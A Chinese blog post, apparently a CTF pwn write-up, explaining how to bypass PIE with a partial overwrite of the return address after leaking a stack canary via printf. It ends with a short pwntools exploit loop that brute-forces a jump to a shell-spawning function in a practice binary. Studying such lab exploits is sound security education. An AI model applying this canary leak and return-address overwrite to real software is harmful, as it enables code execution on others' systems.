花式栈溢出技巧----partial overwrite

最新推荐文章于 2022-10-19 20:47:26 发布
最新推荐文章于 2022-10-19 20:47:26 发布
阅读量1.1k 收藏 4
点赞数 1
分类专栏: pwn基础 文章标签: 花式栈溢出技巧 partial overwrite
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/qq_42192672/article/details/83108383
版权

学习资料:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/stackoverflow/others/#partial-overwrite

                  https://bbs.ichunqiu.com/thread-43627-1-1.html

                  https://www.jianshu.com/p/c3624f5dd583

partial overwrite 这种技巧在很多地方都适用, 这里先以栈上的 partial overwrite 为例来介绍这种思想

我们知道, 在程序开启了 PIE 保护时 (PIE enabled) 高位的地址会发生随机化, 用来由于受到堆栈和libc地址可预测的困扰,但低位的偏移是始终固定的, 也就是说如果我们能更改低位的偏移, 就可以在一定程度上控制程序的执行流, 绕过 PIE 保护

那么就清楚了,这种绕过方法是主要争对PIE保护的,partial write(部分写入)就是一种利用了PIE技术缺陷的bypass技术

打开给的例子

拖进IDA找栈溢出漏洞

第一个read函数可以恶意溢出,第二个read函数百分之百溢出

搜字符串可以搜到我们想要的,同时文件中也包含system函数

可以发现先直接调用函数A3E就好,只要把rip改过去就好

在输入之前, 程序对栈空间进行了清零, 这样我们就无法通过打印栈上信息来 leak binary 或者 libc 的基址了

那咋办,这里从大佬那里看到了printf函数的小技巧

printf 使用 %s 时, 遇到 \0 结束, 覆盖 canary 低位为非 0 值, canary 就可以被 printf 打印出来了,我们把低位数据改一改就可以

研究一波怎么改

先是打断点就已经坑到我了,因为有PIE保护,后来听大佬的方法是先把程序打断点打炸,然后再vmmap,然后重打断点,重新运行才行

汇编代码可以看见buf的地址放在rsi上

输入a的话低位肯定是0x61是非0的

Canary保护机制的原理,是在一个函数入口处从fs段内获取一个随机值,一般存到EBP - 0x4(32位)或RBP - 0x8(64位)的位置, 如果攻击者利用栈溢出修改到了这个值,导致该值与存入的值不一致,__stack_chk_fail函数将抛出异常并退出程序

这样只要接收'a' * (0x30 - 0x8 + 1) 后的 7 位, 再加上最低位的 '\0', 我们就恢复出程序的 canary 了,为啥是七位呢,因为cannary低位是\x00,printf不就停止输出了么,那我们干脆只要七位好了

第二次read的时候我们可以观察到返回地址与 get shell 函数的地址只有低位的 16 bit 不同, 如果覆写低 16 bit 为 0x0A3E, 就有一定的几率 get shell,那我们不断循环直到成功就好了

exp

while True:
    try:
        payload='a'*(0x30-0x08+1)
        cn.recvuntil('Input your Name:')
        cn.send(payload)
        cn.recvuntil('a'*(0x30-0x08+1))
        canary = '\0' + cn.recvn(7)
        success(canary.encode('hex'))
        cn.sendafter(":\n", 'a' * (0x30 - 0x8) + canary + 'bbbbbbbb' + '\x3E\x0A')
        cn.interactive()
    except Exception as e:
        cn.close()
        print e

 

xiaoyuyulala
关注
  • 1
    点赞
  • 4
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
PIE保护绕过
weixin_30633949的博客
09-14 1728
(一):partial write 开了PIE保护的程序,其低12位地址是固定的,所以我们可以采用partial write。但是我们不能写入一个半字节,所以选择写入两个字节,倒数地位进行爆破,范围是0到f,例如: list1 = ["x05","x15","x25","x35","x45","x55","x65","x75","x85","x95","xa5","xb5","x...
partial overwrite
FUCKING12的博客
11-19 783
就是partial overwrite,个人理解就是上有一个地址,这个地址和你想利用的地址又十分相近,只差1,2个字节于是就可以通过爆破这1,2个字节来达到利用的目的。此题开了pie canary,有个后门函数,然后思路就是溢出到system这,泄露canary这参考。上ret处的地址我们可以爆破最后2个字节,来ret到getshell这个函数的地址来得到shell。溢出到system需要用到一个利用手法。
partial overwrite绕过PIE
m0_53932372的博客
10-16 292
pwn
PWN:partial overwrite
m0_53932372的博客
10-19 146
pwn
【How2Pwn】DreamHack 中的Hook Overwrite问题
Jeongon的博客
09-25 567
Hook Overwrite例题和原理
Linux pwn入门教程(7)——PIE与bypass思路
子曰小玖的博客
06-04 2025
https://bbs.ichunqiu.com/thread-43627-1-1.html 0x00 PIE简介 在之前的文章中我们提到过ASLR这一防护技术。由于受到堆和libc地址可预测的困扰,ASLR被设计出来并得到广泛应用。因为ASLR技术的出现,攻击者在ROP或者向进程中写数据时不得不先进行leak,或者干脆放弃堆,转向bss或者其他地址固定的内存块。而PIE(position...
ring-partial-content:环的部分内容中间件
02-01
在这个例子中,wrap-partial-content函数将ring-partial-content中间件应用到app函数上。这样,app现在可以处理部分内容请求了。 总的来说,ring-partial-content中间件是Clojure Web开发中优化性能和提升用户体验...
Partial Multi-Label Learning常用数据集.zip
06-01
Partial Multi-Label Learning(部分多标签学习)是一种机器学习领域中的问题类型,它与传统的多标签学习有所区别。在多标签学习中,每个样本可以关联一个或多个标签,而部分多标签学习则针对那些标签信息不完全的...
vscode-partial-diff:Visual Studio代码扩展。 取两部分文字的差异
04-29
部分差异特征您可以比较文件中,不同文件中或剪贴板中的文本选择(差异)。 多光标文本选择。 用户定义的文本规范化规则,以减少差异中的干扰(例如,将制表符替换为空格)。 可以关闭用户定义的文本规范化规则,而...
2D-Euler_2D-Euler_
09-29
\[ \rho \left( \frac{\partial u}{\partial t} + u \frac{\partial u}{\partial x} + v \frac{\partial u}{\partial y} \right) = -\frac{\partial p}{\partial x} \] 3. 动量方程(y方向): \[ \rho \left( \...
lax2_Lax-Wendroff_
09-29
标题中的“lax2_Lax-Wendroff_”指的是Lax-Wendroff方法,这是一种在数值分析中常用于求解线性 hyperbolic partial differential equations (PDEs)的算法,特别是在流体动力学和偏微分方程的数值解法中。Lax-...
花式溢出
m0_49959202的博客
10-04 688
文章目录花式溢出1.原理1.1 stack pivoting1.2 迁移(frame faking)1.2.1 gadget介绍1.2.2 (payload)布置1.2.3 步骤分析stage 1:stage 2:stage 3:stage 4:stage 5:stage 6:其他迁移方式:1.3 Stack smash1.4 partial overwrite2.例题2.1 stack pivoting2.1.1 习题信息2.1.2 程序分析2.2 迁移(frame faking)2.2.1 习
pwn学习
weixin_40597510的博客
01-24 1112
转自https://r00tk1ts.github.io/2017/09/11/PWN%E9%80%89%E6%89%8B%E7%9A%84%E8%87%AA%E6%88%91%E4%BF%AE%E5%85%BB/#%E6%A0%88%E6%BA%A2%E5%87%BA%E5%88%A9%E7%94%A8%E6%96%B9%E6%B3%95 特性:先进先出 内存的一片区间,型结构管理,...
ctfwiki---基本ROP
xuqi7
11-29 2148
ctfwiki,基本ROP(Return Oriented Programming)复现
ctfwiki--堆的基础操作
I have a dream
06-20 2027
参考链接:https://ctf-wiki.github.io/ctf-wiki/pwn/linux/glibc-heap/implementation/basic-zh/#__comments 堆的基础操作 unlink unlink 用来将一个双向链表(只存储空闲的 chunk)中的一个元素取出来,可能在其他地方使用。 (1)malloc 从恰好合适的 large bin 中获取 chunk...
溢出学习
feng的博客
01-16 1885
前言 跟着ctfwiki学习,所有题目都在ctfwiki上可以找到。加油加油。 溢出原理 溢出指的是程序向中某个变量中写入的字节数超过了这个变量本身所申请的字节数,因而导致与其相邻的中的变量的值被改变。 看一个简单的程序: #include <stdio.h> #include <string.h> void success() { puts("You Hava already controlled it."); system("/bin/sh"); } void
overwrite 的使用区别
热门推荐
あずにゃん梓喵的博客
03-12 1万+
1.overwrite即为重写的意思, 指定了OVERWRITE,会有以下效果: 目标表(或者分区)中的内容(如果有)会被删除,然后再将 filepath 指向的文件/目录中的内容添加到表/分区中。 如果目标表(分区)已经有一个文件,并且文件名和 filepath 中的文件名冲突,那么现有的文件会被新文件所替代。 2.内部表 使用 overwrite: 1.使用inser...
搭建一道PWN题
Jason_ZhouYetao的博客
08-12 3054
最近接到任务,说要出几个pwn题,所以就去熟悉了一下PWN题的搭建: 第一步,准备一道pwn题的源码 #include&lt;stdio.h&gt; int main() { int a=1; float key=2018.81,input; if (a==2) { printf("input your key:\n"); scanf("%f",&amp;input); ...
pwn,获取系统权限,入门题,cyclic
weixin_42072280的博客
05-19 3466
https://blog.csdn.net/SanOrintea/article/details/82288959 大部分还是按照这个来的,就是关于数前面有多少个字符的时候,这个博客是用cyclic -l来数的,但是我在gdb中运行这个命令的时候显示有错误, 我觉得可能是因为那个博客是pwndbg,我是gdb-peda,所以,我就是列了这200个字符的规律,数了一下,当然按...
partial-mapped crossover (pmx)
最新发布
01-15
Partial-Mapped Crossover(PMX)是一种常用于遗传算法中的交叉操作。其目的是在两个父代个体中交换一部分基因片段,以产生新的个体作为下一代的可能解。 PMX首先选择两个随机位置作为交叉点,然后将这两个位置之间的基因片段进行交换。交换后,每个子代个体中仍然可能存在相同的基因,但不同基因的顺序被改变了。接下来,我们需要对子代个体进行处理,以确保没有重复的基因。 具体来说,我们从交叉点之后的基因片段开始,将其中的重复基因对应到另一个父代个体中的相同位置,并将其相映射的基因也进行相应的交换。这一过程同样适用于交叉点之前的基因片段。这样,我们就得到了一个没有重复基因的子代个体。 举个例子来说,假设有两个父代个体分别为A = [1, 2, 3, 4, 5, 6]和B=[4, 2, 6, 1, 3, 5],选择的交叉点为2和4。在交换了交叉点2和4之间的基因片段之后,得到的子代个体为C=[1, 2, 6, 4, 3, 5]。我们需要处理C中的重复基因。 首先,我们找到C中重复的基因2和6,对应到A中的位置为2和3,于是交换A中2和3位置的基因,得到A’=[1, 6, 3, 4, 5, 2]。然后,我们找到C中重复的基因4和3,对应到B中的位置为4和3,于是交换B中4和3位置的基因,得到B’=[4, 2, 5, 1, 6, 3]。最终,我们得到了没有重复基因的子代个体C’=[1, 6, 5, 4, 3, 2]作为下一代的可能解。 通过进行PMX交叉操作可以保留父代个体中的一些有用特征,并产生新的个体,增加了遗传算法搜索解空间的多样性。

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值